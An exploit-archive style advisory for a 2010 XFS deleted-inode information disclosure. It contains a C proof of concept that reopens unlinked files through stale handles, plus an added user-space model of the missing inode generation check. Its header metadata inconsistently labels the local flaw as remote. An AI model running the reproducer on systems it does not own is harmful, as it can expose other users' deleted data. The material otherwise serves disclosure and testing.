XFS Deleted Inode Local Information Disclosure Vulnerability

2010-10-05 / 2010-10-06
Credit: Red Hat
Risk: High
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 7.9/10
Impact Subscore: 9.2/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: None

/*
 * stale_handle.c - attempt to create a stale handle and open it
 *
 * Copyright (C) 2010 Red Hat, Inc. All Rights reserved.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 *
 * Credit: David Chinner
 *
 * The XFS filesystem is prone to a local information-disclosure vulnerability.
 *
 * Local attackers can exploit this issue to obtain sensitive information that
 * may lead to further attacks. Denial-of-service attacks may also be possible.
 */
#define TEST_UTIME
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <sys/param.h>      /* MAXPATHLEN */
#include <sys/stat.h>
#include <sys/types.h>
#include <xfs/xfs.h>
#include <xfs/handle.h>     /* libhandle: path_to_handle(), open_by_handle() */

#define NUMFILES    1024

int
main(int argc, char **argv)
{
    int         i;
    int         fd;
    int         ret;
    int         failed = 0;
    char        fname[MAXPATHLEN];
    char        *test_dir;
    void        *handle[NUMFILES];
    size_t      hlen[NUMFILES];
    void        *fshandle;
    size_t      fshlen;
    struct stat st;

    if (argc != 2) {
        fprintf(stderr, "usage: stale_handle test_dir\n");
        return EXIT_FAILURE;
    }

    test_dir = argv[1];
    if (stat(test_dir, &st) != 0) {
        perror("stat");
        return EXIT_FAILURE;
    }

    /* register the filesystem with libhandle; per-file handles need this first */
    ret = path_to_fshandle(test_dir, &fshandle, &fshlen);
    if (ret < 0) {
        perror("path_to_fshandle");
        return EXIT_FAILURE;
    }

    /*
     * create a large number of files to force allocation of new inode
     * chunks on disk.
     */
    for (i = 0; i < NUMFILES; i++) {
        sprintf(fname, "%s/file%06d", test_dir, i);
        fd = open(fname, O_RDWR | O_CREAT | O_TRUNC, 0644);
        if (fd < 0) {
            printf("Warning (%s,%d), open(%s) failed.\n",
                   __FILE__, __LINE__, fname);
            perror(fname);
            return EXIT_FAILURE;
        }
        close(fd);
    }

    /* sync to get the new inodes to hit the disk */
    sync();

    /* create the handles */
    for (i = 0; i < NUMFILES; i++) {
        sprintf(fname, "%s/file%06d", test_dir, i);
        ret = path_to_handle(fname, &handle[i], &hlen[i]);
        if (ret < 0) {
            perror("path_to_handle");
            return EXIT_FAILURE;
        }
    }

    /* unlink the files */
    for (i = 0; i < NUMFILES; i++) {
        sprintf(fname, "%s/file%06d", test_dir, i);
        ret = unlink(fname);
        if (ret < 0) {
            perror("unlink");
            return EXIT_FAILURE;
        }
    }

    /* sync to get log forced for unlink transactions to hit the disk */
    sync();

    /* sync once more FTW */
    sync();

    /*
     * now drop the caches so that unlinked inodes are reclaimed and
     * buftarg page cache is emptied so that the inode cluster has to be
     * fetched from disk again for the open_by_handle() call.
     */
    system("echo 3 > /proc/sys/vm/drop_caches");

    /*
     * now try to open the files by the stored handles. Expecting ENOENT
     * for all of them.
     */
    for (i = 0; i < NUMFILES; i++) {
        errno = 0;
        fd = open_by_handle(handle[i], hlen[i], O_RDWR);
        if (fd < 0 && errno == ENOENT) {
            free_handle(handle[i], hlen[i]);
            continue;
        }
        /* anything else is a failure: test fd, not the stale unlink() result */
        if (fd >= 0) {
            printf("open_by_handle(%d) opened an unlinked file!\n", i);
            close(fd);
        } else
            printf("open_by_handle(%d) returned %d incorrectly on an unlinked file!\n",
                   i, errno);
        free_handle(handle[i], hlen[i]);
        failed++;
    }

    if (failed)
        return EXIT_FAILURE;
    return EXIT_SUCCESS;
}
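Added illustration (not the advisory's code and not XFS's own implementation): a user-space model of the validation a handle-based open needs. A handle names an inode number plus a generation; before exposing any data the filesystem must confirm the inode is still allocated and that the generation matches, otherwise a handle held across an unlink resolves to freed blocks or to whatever file later reuses that inode number. The names (itable, open_unchecked, open_checked) are assumptions; ENOENT for a freed inode is the result the test above expects, and ESTALE for a generation mismatch is the conventional stale-handle errno.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#define NINODES 8

/* itable[] stands in for on-disk inodes; data[] for a file's blocks. */
struct inode_rec {
    int allocated;  /* inode currently holds a live file */
    uint32_t gen;   /* bumped every time this inode number is reused */
    char data[32];
};
struct handle { uint64_t ino; uint32_t gen; };
static struct inode_rec itable[NINODES];

/* Allocate inode `ino` for new content; reuse bumps the generation. */
static int alloc_inode(uint64_t ino, const char *content) {
    if (ino >= NINODES || itable[ino].allocated) return -EEXIST;
    itable[ino].allocated = 1;
    itable[ino].gen++;
    snprintf(itable[ino].data, sizeof itable[ino].data, "%s", content);
    return 0;
}

/* Unlink: the slot is free again, but the old bytes stay on "disk". */
static int free_inode(uint64_t ino) {
    if (ino >= NINODES || !itable[ino].allocated) return -ENOENT;
    itable[ino].allocated = 0;
    return 0;
}

/* A handle captures the inode number and its generation at issue time. */
static struct handle make_handle(uint64_t ino) {
    struct handle h = { ino, itable[ino].gen };
    return h;
}

/* Vulnerable shape: trusts the handle and returns whatever the slot holds. */
static const char *open_unchecked(const struct handle *h, int *err) {
    *err = (h->ino < NINODES) ? 0 : -EINVAL;
    return *err ? NULL : itable[h->ino].data;
}

/* Fixed shape: an untrusted handle is validated against inode state first. */
static const char *open_checked(const struct handle *h, int *err) {
    if (h->ino >= NINODES)            { *err = -EINVAL; return NULL; }
    if (!itable[h->ino].allocated)    { *err = -ENOENT; return NULL; }
    if (itable[h->ino].gen != h->gen) { *err = -ESTALE; return NULL; }
    *err = 0;
    return itable[h->ino].data;
}
```

Run the sequence create, take handle, unlink, then open: the unchecked path still returns the old bytes (and, after the slot is reused, the new owner's bytes), while the checked path returns ENOENT and then ESTALE.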

References:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=7124fe0a5b619d65b739477b3b55a20bf805b06d
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=1920779e67cbf5ea8afef317777c5bf2b8096188
https://bugzilla.redhat.com/show_bug.cgi?id=624923
http://www.securityfocus.com/bid/42527
http://www.openwall.com/lists/oss-security/2010/08/19/5
http://www.openwall.com/lists/oss-security/2010/08/18/2
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.35
http://oss.sgi.com/archives/xfs/2010-06/msg00198.html
http://oss.sgi.com/archives/xfs/2010-06/msg00191.html
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=7b6259e7a83647948fa33a736cc832310c8d85aa
http://article.gmane.org/gmane.comp.file-systems.xfs.general/33771
http://article.gmane.org/gmane.comp.file-systems.xfs.general/33769
http://article.gmane.org/gmane.comp.file-systems.xfs.general/33768
http://article.gmane.org/gmane.comp.file-systems.xfs.general/33767
